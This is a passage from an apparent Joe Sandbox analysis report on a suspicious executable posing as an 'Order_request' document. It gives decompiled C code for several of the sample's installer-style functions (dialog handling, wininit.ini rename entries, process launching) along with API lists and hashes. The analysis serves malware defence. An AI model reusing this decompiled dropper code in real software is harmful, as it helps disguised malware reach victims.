					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00404118( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
					_t118 = GetDlgItem(_a4, 0x3e8);
					E0040412B(_t118);
					SendMessageW(_t118, 0x45b, 1, 0);
					_t92 =  *( *0x7a8a50 + 0x68);
					if(_t92 < 0) {
						_t92 = GetSysColor( ~_t92);
					}
					SendMessageW(_t118, 0x443, 0, _t92);
					SendMessageW(_t118, 0x445, 0, 0x4010000);
					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
					 *0x79ff0c = 0;
					SendMessageW(_t118, 0x449, _a8,  &_v16);
					 *0x79ff0c = 0;
					return 0;
				}
			}





















                                                0x004042a5
                                                0x004043c5
                                                0x004043d2
                                                0x0040442f
                                                0x0040442f
                                                0x00404433
                                                0x00404501
                                                0x00404508
                                                0x0040450a
                                                0x0040450a
                                                0x0040450a
                                                0x00404510
                                                0x00404510
                                                0x00404513
                                                0x00000000
                                                0x0040451a
                                                0x00404441
                                                0x00404447
                                                0x0040444a
                                                0x00404451
                                                0x00404453
                                                0x0040445a
                                                0x0040445c
                                                0x0040445f
                                                0x00404462
                                                0x00404467
                                                0x0040446d
                                                0x00404470
                                                0x00404477
                                                0x00404484
                                                0x00404495
                                                0x0040449f
                                                0x004044aa
                                                0x004044b9
                                                0x004044bf
                                                0x004044bf
                                                0x00404477
                                                0x0040445a
                                                0x004044c2
                                                0x004044c9
                                                0x00000000
                                                0x004044cb
                                                0x004044cb
                                                0x004044d2
                                                0x00000000
                                                0x00000000
                                                0x004044d4
                                                0x004044d8
                                                0x004044e8
                                                0x004044e8
                                                0x004044ea
                                                0x004044ee
                                                0x004044fa
                                                0x004044fa
                                                0x00000000
                                                0x004044fe
                                                0x004044c9
                                                0x004043da
                                                0x004043dd
                                                0x00000000
                                                0x00000000
                                                0x004043e3
                                                0x004043e9
                                                0x00000000
                                                0x00000000
                                                0x004043ef
                                                0x004043f4
                                                0x004043f4
                                                0x004043f7
                                                0x004043fa
                                                0x00000000
                                                0x00000000
                                                0x00404421
                                                0x00404421
                                                0x00404423
                                                0x00404425
                                                0x0040442a
                                                0x00000000
                                                0x004042ab
                                                0x004042ab
                                                0x004042ae
                                                0x004042b3
                                                0x004042b5
                                                0x004042c4
                                                0x004042c4
                                                0x004042cc
                                                0x004042cf
                                                0x004042d3
                                                0x004042d6
                                                0x004042da
                                                0x004042dd
                                                0x004042e0
                                                0x004042e3
                                                0x004042ea
                                                0x004042ec
                                                0x004042ec
                                                0x004042f6
                                                0x00404303
                                                0x0040430d
                                                0x00404312
                                                0x00404315
                                                0x0040431a
                                                0x00404331
                                                0x00404338
                                                0x0040434b
                                                0x0040434e
                                                0x00404362
                                                0x00404369
                                                0x0040436e
                                                0x00404373
                                                0x00404373
                                                0x00404381
                                                0x0040438f
                                                0x004043a1
                                                0x004043a6
                                                0x004043b6
                                                0x004043b8
                                                0x00000000
                                                0x004043be

                                                APIs
                                                • CheckDlgButton.USER32 ref: 00404331
                                                • GetDlgItem.USER32 ref: 00404345
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404362
                                                • GetSysColor.USER32(?), ref: 00404373
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404381
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                                                • lstrlenW.KERNEL32(?), ref: 00404394
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043B6
                                                • GetDlgItem.USER32 ref: 0040440F
                                                • SendMessageW.USER32(00000000), ref: 00404416
                                                • GetDlgItem.USER32 ref: 00404441
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404484
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404492
                                                • SetCursor.USER32(00000000), ref: 00404495
                                                • ShellExecuteW.SHELL32(0000070B,open,iz,00000000,00000000,00000001), ref: 004044AA
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044B6
                                                • SetCursor.USER32(00000000), ref: 004044B9
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044E8
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: N$open$iz
                                                • API String ID: 3615053054-3184408566
                                                • Opcode ID: 01da6d32b2a417ec90abe3a2877bb8b4f20cf3725a55cc12a2a61828b7308d80
                                                • Instruction ID: f5fa6e7357a1776686f67c5c85bccc632f1e4afc8f648020f62b4c2f23f21bc2
                                                • Opcode Fuzzy Hash: 01da6d32b2a417ec90abe3a2877bb8b4f20cf3725a55cc12a2a61828b7308d80
                                                • Instruction Fuzzy Hash: CA7181B1900609BFDB109F60DD85E6A7B79FB84744F04853AF705B61E0CB789951CFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405D61 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 131stringmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405D61(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				WCHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyW(0x7a55e0, L"NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t2 = _t53 + 0x1c; // 0x7a5de0
					_t13 = GetShortPathNameW( *_t2, 0x7a5de0, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x7a51e0, "%ls=%ls\r\n", 0x7a55e0, 0x7a5de0);
						_t54 = _t53 + 0x10;
						E00406054(_t38, 0x400, 0x7a5de0, 0x7a5de0,  *((intOrPtr*)( *0x7a8a50 + 0x128)));
						_t13 = E00405C07(0x7a5de0, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405C8A(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405B6C(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405B6C(_t39, _t22 + 0xa, "\n[");
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E00405BC2(_t25 + _t47, 0x7a51e0, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405CB9(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C07(_t45, 0, 1));
					_t13 = GetShortPathNameW(_t45, 0x7a55e0, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}



















                                                0x00405d61
                                                0x00405d70
                                                0x00405d76
                                                0x00405d87
                                                0x00405daf
                                                0x00405db6
                                                0x00405dba
                                                0x00405dbe
                                                0x00405dde
                                                0x00405de5
                                                0x00405def
                                                0x00405dfc
                                                0x00405e01
                                                0x00405e06
                                                0x00405e0a
                                                0x00405e19
                                                0x00405e1b
                                                0x00405e28
                                                0x00405e2c
                                                0x00405ec7
                                                0x00000000
                                                0x00405e42
                                                0x00405e4f
                                                0x00405e73
                                                0x00405e77
                                                0x00405e96
                                                0x00405e9a
                                                0x00405e9a
                                                0x00405e9c
                                                0x00405ea5
                                                0x00405eb0
                                                0x00405ebb
                                                0x00405ec1
                                                0x00000000
                                                0x00405ec1
                                                0x00405e79
                                                0x00405e7c
                                                0x00405e87
                                                0x00405e83
                                                0x00405e85
                                                0x00405e86
                                                0x00405e86
                                                0x00405e8e
                                                0x00405e90
                                                0x00000000
                                                0x00405e90
                                                0x00405e5a
                                                0x00405e60
                                                0x00000000
                                                0x00405e60
                                                0x00405e2c
                                                0x00405e0a
                                                0x00405d89
                                                0x00405d94
                                                0x00405d9d
                                                0x00405da1
                                                0x00000000
                                                0x00000000
                                                0x00405da1
                                                0x00405ed2

                                                APIs
                                                • lstrcpyW.KERNEL32 ref: 00405D70
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405EF4,?,?), ref: 00405D94
                                                • GetShortPathNameW.KERNEL32 ref: 00405D9D
                                                  • Part of subcall function 00405B6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B7C
                                                  • Part of subcall function 00405B6C: lstrlenA.KERNEL32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BAE
                                                • GetShortPathNameW.KERNEL32 ref: 00405DBA
                                                • wsprintfA.USER32 ref: 00405DD8
                                                • GetFileSize.KERNEL32(00000000,00000000,007A5DE0,C0000000,00000004,007A5DE0,?), ref: 00405E13
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405E22
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405E5A
                                                • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,007A51E0,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB0
                                                • GlobalFree.KERNEL32 ref: 00405EC1
                                                • CloseHandle.KERNEL32(00000000), ref: 00405EC8
                                                  • Part of subcall function 00405C07: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                  • Part of subcall function 00405C07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]$Uz$]z$]z
                                                • API String ID: 222337774-2882615421
                                                • Opcode ID: 96167ce44ddedef176c8bff3fbbd2245610190e2ff8f9a1c8bc4a62397111b78
                                                • Instruction ID: 75cee4360bd3bcd07888cd864a4516e3a0162a31efabfd5f0f4b5e85420b189e
                                                • Opcode Fuzzy Hash: 96167ce44ddedef176c8bff3fbbd2245610190e2ff8f9a1c8bc4a62397111b78
                                                • Instruction Fuzzy Hash: 6C31F370600B14BBD2216B219D49F6B3E6CDF45755F14043AFA81F62D2DA3CEA018EAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8a50;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, "Overcaustically Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a48;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,Overcaustically Setup,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F$Overcaustically Setup
                                                • API String ID: 941294808-1772504776
                                                • Opcode ID: ce6bfb0b893aacce883330537bc8e63ee4883ce97208896732d7138368f4d8d8
                                                • Instruction ID: de39ae593db74bf8e739f7026f96e360392c145d264594217dd326fc860e90c0
                                                • Opcode Fuzzy Hash: ce6bfb0b893aacce883330537bc8e63ee4883ce97208896732d7138368f4d8d8
                                                • Instruction Fuzzy Hash: E2418C71800209AFCF058F95DE459AFBBB9FF45310F00842EF991AA1A0CB38DA54DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007E194F Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 83processstringsynchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 89%
                                                			E007E194F() {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v2138;
				short _v2140;
				WCHAR* _t24;
				WCHAR* _t25;
				int _t26;
				signed int _t34;
				short _t36;
				short _t37;
				void* _t43;

				_t34 = 0x10;
				memset( &(_v92.lpReserved), 0, _t34 << 2);
				_v24.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v92.cb = 0x44;
				_t43 = 0x20;
				lstrcpynW( &_v2140, GetCommandLineW(), 0x400);
				_t24 =  &_v2140;
				if(_v2140 == 0x22) {
					_t24 =  &_v2138;
					_t43 = 0x22;
				}
				while(1) {
					_t36 =  *_t24;
					if(_t36 == 0) {
						break;
					}
					if(_t36 == _t43) {
						break;
					}
					_t24 = CharNextW(_t24);
				}
				_t25 = CharNextW(_t24);
				while(1) {
					_t37 =  *_t25;
					if(_t37 == 0) {
						break;
					}
					if(_t37 != 0x20) {
						break;
					}
					_t25 =  &(_t25[1]);
				}
				_t26 = CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v24);
				_v8 = _t26;
				if(_t26 == 0) {
					ExitProcess(0xc000001d);
				}
				WaitForSingleObject(_v24.hProcess, 0xffffffff);
				GetExitCodeProcess(_v24.hProcess,  &_v8);
				CloseHandle(_v24);
				CloseHandle(_v24.hThread);
				ExitProcess(_v8);
			}















                                                0x007e195d
                                                0x007e1965
                                                0x007e196a
                                                0x007e196d
                                                0x007e196e
                                                0x007e196f
                                                0x007e1972
                                                0x007e1979
                                                0x007e198d
                                                0x007e199b
                                                0x007e19a1
                                                0x007e19a5
                                                0x007e19ab
                                                0x007e19ab
                                                0x007e19bc
                                                0x007e19bc
                                                0x007e19c2
                                                0x00000000
                                                0x00000000
                                                0x007e19b7
                                                0x00000000
                                                0x00000000
                                                0x007e19ba
                                                0x007e19ba
                                                0x007e19c5
                                                0x007e19d1
                                                0x007e19d1
                                                0x007e19d7
                                                0x00000000
                                                0x00000000
                                                0x007e19cd
                                                0x00000000
                                                0x00000000
                                                0x007e19d0
                                                0x007e19d0
                                                0x007e19ea
                                                0x007e19f2
                                                0x007e19f5
                                                0x007e1a2d
                                                0x007e1a2d
                                                0x007e19fc
                                                0x007e1a09
                                                0x007e1a18
                                                0x007e1a1d
                                                0x007e1a22

                                                APIs
                                                • GetCommandLineW.KERNEL32(00000400), ref: 007E197F
                                                • lstrcpynW.KERNEL32(?,00000000), ref: 007E198D
                                                • CharNextW.USER32(00000022), ref: 007E19BA
                                                • CharNextW.USER32(00000022), ref: 007E19C5
                                                • CreateProcessW.KERNEL32 ref: 007E19EA
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007E19FC
                                                • GetExitCodeProcess.KERNEL32 ref: 007E1A09
                                                • CloseHandle.KERNEL32(?), ref: 007E1A18
                                                • CloseHandle.KERNEL32(?), ref: 007E1A1D
                                                • ExitProcess.KERNEL32 ref: 007E1A22
                                                • ExitProcess.KERNEL32 ref: 007E1A2D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                • String ID: "$D
                                                • API String ID: 3771911414-1154559923
                                                • Opcode ID: d6b924d6c731369243db0f68181227ef16f1c75a436691a70405be8fb5f9306d
                                                • Instruction ID: 7356d163703bab96d61bf0c0f7e4958a51424e7ebafe37103fd070a19ce3aec8
                                                • Opcode Fuzzy Hash: d6b924d6c731369243db0f68181227ef16f1c75a436691a70405be8fb5f9306d
                                                • Instruction Fuzzy Hash: 6A217F7180118DBEDB10EBD5CC99AEFBB7DEB08315F904066E202BA0A1DB741E45DB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100022D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E100022D0(void* __edx) {
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t42;
				signed int* _t43;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t42 = 0x1a;
					if(_t52 == _t42) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t42;
							goto L12;
						} else {
							_t38 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t38 = E10001243();
						L11:
						_t52 = _t38;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t43 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t39 =  *_t51;
						_t51[7] = _t51[7] & 0x00000000;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t40;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
								case 0:
									 *_t43 =  *_t43 & 0x00000000;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if(lstrlenW(__ebp) > 0) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E1000122C(0x10004044);
					goto L10;
				}
			}











                                                0x100022e4
                                                0x100022e8
                                                0x100022f3
                                                0x100022f3
                                                0x100022fa
                                                0x100022ff
                                                0x00000000
                                                0x00000000
                                                0x10002303
                                                0x10002306
                                                0x00000000
                                                0x00000000
                                                0x1000230b
                                                0x10002316
                                                0x10002326
                                                0x00000000
                                                0x1000231d
